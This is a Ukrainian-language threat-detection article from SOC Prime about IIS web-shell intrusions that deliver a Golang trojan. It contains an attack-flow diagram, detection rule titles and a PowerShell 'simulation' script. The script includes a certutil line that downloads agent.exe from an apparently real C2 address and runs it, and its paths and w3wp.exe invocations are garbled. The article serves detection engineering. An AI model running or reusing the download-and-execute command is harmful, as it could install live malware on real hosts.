SOC Prime Bias: Критичний

29 Dec 2025 12:37

Спроба, Помилка та Описки: Чому Деякі Атаки Зловмисного ПЗ Не Такі «Софістиковані», Як Ви Думаєте

Author Photo
Ruslan Mikhalov Керівник досліджень загроз у SOC Prime linkedin icon Стежити
Спроба, Помилка та Описки: Чому Деякі Атаки Зловмисного ПЗ Не Такі «Софістиковані», Як Ви Думаєте
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

У статті описуються три окремі інциденти, де зловмисник використовував компрометовані веб-сервери IIS для завантаження та виконання троянця на базі Golang (agent.exe) на кінцевих точках жертв. Зловмисники повторно намагалися виконання, використовували certutil для отримання корисних навантажень, і пізніше додали винятки Windows Defender перед спробою встановити стійкість через службу Windows. Виявлення досягалося через EDR і Sysmon журнали, які зафіксували командні рядки, дерева процесів та мережеву активність. Атаки ілюструють, як противники адаптуються до захисних обходів замість того, щоб слідувати безпомилковому плану.

Розслідування

Аналітики Huntress вивчили журнали подій Windows, події Sysmon та журнали веб-сервера IIS для відновлення ланцюга атаки. Вони виявили початкове виконання веб-шелу через w3wp.exe, спостерігали помилково сформовані команди, повторні спроби доставки корисних навантажень та створення служби під назвою WindowsUpdate, яку не вдалося запустити. Було зібрано та корельовано різні індикатори, такі як шляхи до файлів, командні рядки та мережеві з’єднання, через три інциденти.

Пом’якшення

Ключові заходи пом’якшення включають посилення захисту серверів IIS, обмеження виконання веб-шелів, впровадження суворих списків дозволених застосунків, моніторинг аномального використання LOLBins, таких як certutil та PowerShell, і забезпечення того, щоб винятки Windows Defender не створювалися необґрунтовано. Також рекомендується швидка ізоляція компрометованих хостів і видалення інструментів, як-от GotoHTTP.

Відповідь

Після виявлення відповідальні повинні ізолювати постраждалу кінцеву точку, зібрати повні журнали процесів та мережевої активності, видалити всі шкідливі виконувані файли, відновити несанкціоновані винятки Windows Defender і перевірити збої в створенні служб. Проведіть ретельний огляд веб-сервера на предмет компрометованих сторінок та змініть усі компрометовані облікові дані.

“graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 classDef technique fill:#c2c2f0 classDef malware fill:#ff9999 %% Node Definitions initial_access[“<b>Дія</b> – <b>T1505.004 Компонент серверного програмного забезпечення: Компоненти IIS</b><br />Скомпрометовано публічний веб-сервер IIS, розгорнуто веб-шел через w3wp.exe”] web_shell[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: Веб-шел<br /><b>Файл</b>: login.aspx”] process_w3wp[“<b>Процес</b> – <b>Назва</b>: w3wp.exe<br /><b>Призначення</b>: Хостинг веб-додатків”] execution[“<b>Дія</b> – <b>T1059.003 Командна оболонка Windows</b><br />Виконано команди як whoami, netstat, ipconfig”] powershell_exec[“<b>Інструмент</b> – <b>Назва</b>: PowerShell<br /><b>Техніка</b>: T1059.001”] discovery[“<b>Дія</b> – <b>Техніки виявлення</b>”] account_discovery[“<b>Техніка</b> – <b>T1087.001 Локальний акаунт</b><br />Перераховано локальні користувацькі акаунти”] group_discovery[“<b>Техніка</b> – <b>T1069.001 Локальні групи</b><br />Перераховано членство у локальних групах”] network_conn_disc[“<b>Техніка</b> – <b>T1049 Сканування мережевих послуг</b><br />Виявлено активні мережеві з’єднання”] internet_conn_disc[“<b>Техніка</b> – <b>T1016.001 Виявлення інтернет-з’єднань</b><br />Перевірено зовнішню підключеність”] defense_evasion[“<b>Дія</b> – <b>Техніки ухилення від захисту</b>”] certutil[“<b>Інструмент</b> – <b>Назва</b>: certutil.exe<br /><b>Техніка</b>: T1218 Виконання проксі бінарного файлу системи”] hide_files[“<b>Техніка</b> – <b>T1564.001 Приховання артефактів: Приховані файли і каталоги</b><br />Встановлено атрибути прихованого та системного типів”] defender_exclusion[“<b>Техніка</b> – <b>T1562 Ослаблення захисту</b> та <b>T1564.012 Винятки шляхів файлів</b><br />Додано винятки Windows Defender через PowerShell”] lateral_transfer[“<b>Дія</b> – <b>T1570 Латеральне перенесення інструментів</b><br />Скопійовано шкідливі бінарні файли з зовнішнього сервера”] malicious_binaries[“<b>Шкідливе ПЗ</b> – <b>Файли</b>: agent.exe, 815.exe, dllhost.exe”] persistence[“<b>Дія</b> – <b>T1546.010 Тригерне виконання подій: Служба Windows</b><br />Створено службу ‘WindowsUpdate’, що вказує на dllhost.exe”] service_creation[“<b>Процес</b> – <b>Назва</b>: Служба Windows ‘WindowsUpdate'”] final_execution[“<b>Дія</b> – <b>Фінальне виконання</b><br />Служба запущена, зловмисник підтримує контроль”] %% Class Assignments class initial_access action class web_shell malware class process_w3wp process class execution action class powershell_exec tool class discovery action class account_discovery technique class group_discovery technique class network_conn_disc technique class internet_conn_disc technique class defense_evasion action class certutil tool class hide_files technique class defender_exclusion technique class lateral_transfer action class malicious_binaries malware class persistence action class service_creation process class final_execution action %% Connections initial_access u002du002d>|використовує| web_shell web_shell u002du002d>|запускає| process_w3wp process_w3wp u002du002d>|активує| execution execution u002du002d>|використовує| powershell_exec execution u002du002d>|призводить до| discovery discovery u002du002d>|включає| account_discovery discovery u002du002d>|включає| group_discovery discovery u002du002d>|включає| network_conn_disc discovery u002du002d>|включає| internet_conn_disc discovery u002du002d>|призводить до| defense_evasion defense_evasion u002du002d>|використовує| certutil defense_evasion u002du002d>|застосовує| hide_files defense_evasion u002du002d>|застосовує| defender_exclusion defense_evasion u002du002d>|призводить до| lateral_transfer lateral_transfer u002du002d>|переносить| malicious_binaries malicious_binaries u002du002d>|активує| persistence persistence u002du002d>|створює| service_creation service_creation u002du002d>|ініціює| final_execution “

Потік атаки

Виявлення

Атрибуція виконання для приховування файлів (через командний рядок)

Команда SOC Prime
23 грудня 2025

Підозріле виконуване ім’я, що містить тільки числа (через командний рядок)

Команда SOC Prime
23 грудня 2025

Підозрілі зміни налаштувань Windows Defender (через powershell)

Команда SOC Prime
23 грудня 2025

Використання Certutil для кодування даних та операцій сертифікації (через командний рядок)

Команда SOC Prime
23 грудня 2025

Підозрілі файли в загальному профілі користувача (через подію з файлом)

Команда SOC Prime
23 грудня 2025

Підозріле виконання з загального профілю користувача (через створення процесу)

Команда SOC Prime
23 грудня 2025

IOC (SourceIP) для виявлення: Trial, Error, and Typos: Чому деякі атаки шкідливого ПО не такі ‘складні’, як ви думаєте

Правила SOC Prime AI
23 грудня 2025

IOC (HashSha256) для виявлення: Trial, Error, and Typos: Чому деякі атаки шкідливого ПО не такі ‘складні’, як ви думаєте

Правила SOC Prime AI
23 грудня 2025

IOC (DestinationIP) для виявлення: Trial, Error, and Typos: Чому деякі атаки шкідливого ПО не такі ‘складні’, як ви думаєте

Правила SOC Prime AI
23 грудня 2025

Виявлення зловмисних POST-запитів на веб-сервері [Webserver]

Правила SOC Prime AI
23 грудня 2025

Виявлення виконання з командного рядка з процесу веб-сервера [Windows Process Creation]

Правила SOC Prime AI
23 грудня 2025

Виконання симуляції

Передумова: Телеметрія та попередня перевірка бази повинні бути успішними.

Обґрунтування: У цьому розділі деталізується точне виконання техніки противника (TTP), призначеної для активації правила виявлення. Команди та наратив ПОВИННІ прямо відображати ідентифіковані TTP і прагнути генерувати точну телеметрію, очікувану логікою виявлення.

  • Наратив атаки та команди:
    Зловмисник, який уже отримав можливість виконання коду на компрометованому сервері IIS, використовує w3wp.exe процес (робітник IIS) для виконання серії проксі підписаних двійкових файлів. Спочатку зловмисники перераховують системний та мережевий стан (whoami.exe, netstat -an, ipconfig /all). Потім використовують certutil.exe для завантаження шкідливого корисного навантаження (agent.exe) з віддаленого сервера C2 та негайно виконують його в каталозі загального користувача. Усі команди виконуються через cmd.exe /c запущений у контексті w3wp.exe, забезпечуючи відповідність події створення процесу умовам правила.

    # 1. Перерахування системної/користувацької інформації
    Start-Process -FilePath "C:WindowsSystem32w3wp.exe" -ArgumentList '/c whoami.exe' -NoNewWindow
    Start-Process -FilePath "C:WindowsSystem32w3wp.exe" -ArgumentList '/c netstat -an' -NoNewWindow
    Start-Process -FilePath "C:WindowsSystem32w3wp.exe" -ArgumentList '/c ipconfig /all' -NoNewWindow
    
    # 2. Завантаження шкідливого корисного навантаження через certutil та його виконання
    $maliciousCmd = '"cmd" /c certutil.exe -urlcache -split -f https://110.172.104.95:8000/api/download/windows-tools/amd64 C:UsersPublicagent.exe && start /b C:UsersPublicagent.exe'
    Start-Process -FilePath "C:WindowsSystem32w3wp.exe" -ArgumentList $maliciousCmd -NoNewWindow
  • Сценарій регресійного тестування: Сценарій нижче автоматизує весь ланцюг атаки, відтворюючи точну телеметрію, яка повинна запустити правило Sigma.

    <#
    .SYNOPSIS
        Імітує діяльність противника, що запускає правило Sigma "Виявлення виконання команд з процесу веб-сервера".
    .DESCRIPTION
        Виконує серію команд виявлення та завантаження-та-виконання з процесу робітника IIS (w3wp.exe).
        Запустіть на хості Windows, де увімкнено аудит створення процесу (Event ID 4688).
    #>
    
    # Функція для виклику команди через w3wp.exe
    function Invoke-W3wpCommand {
        param (
            [Parameter(Mandatory=$true)]
            [string]$CmdLine
        )
        Write-Host "Виклик через w3wp.exe: $CmdLine"
        Start-Process -FilePath "C:WindowsSystem32w3wp.exe" -ArgumentList "/c $CmdLine" -WindowStyle Hidden -PassThru | Out-Null
    }
    
    # 1. Команди виявлення (MITRE T1033, T1016, T1069.001)
    $discoveryCommands = @(
        "whoami.exe",
        "netstat -an",
        "net user admin$",
        "ipconfig /all",
        "net localgroup administrators"
    )
    foreach ($cmd in $discoveryCommands) {
        Invoke-W3wpCommand -CmdLine $cmd
        Start-Sleep -Seconds 2
    }
    
    # 2. Шкідливе завантаження-та-виконання (MITRE T1218.004)
    $maliciousCmd = '"cmd" /c certutil.exe -urlcache -split -f https://110.172.104.95:8000/api/download/windows-tools/amd64 C:UsersPublicagent.exe && start /b C:UsersPublicagent.exe'
    Invoke-W3wpCommand -CmdLine $maliciousCmd
  • Команди очищення: Видалити завантажене корисне навантаження та завершити всі зайві процеси.

    # Видалити шкідливий двійковий файл агента
    Remove-Item -Path "C:UsersPublicagent.exe" -Force -ErrorAction SilentlyContinue
    
    # За необхідності зупинити агента, якщо він ще працює
    Get-Process -Name "agent" -ErrorAction SilentlyContinue | Stop-Process -Force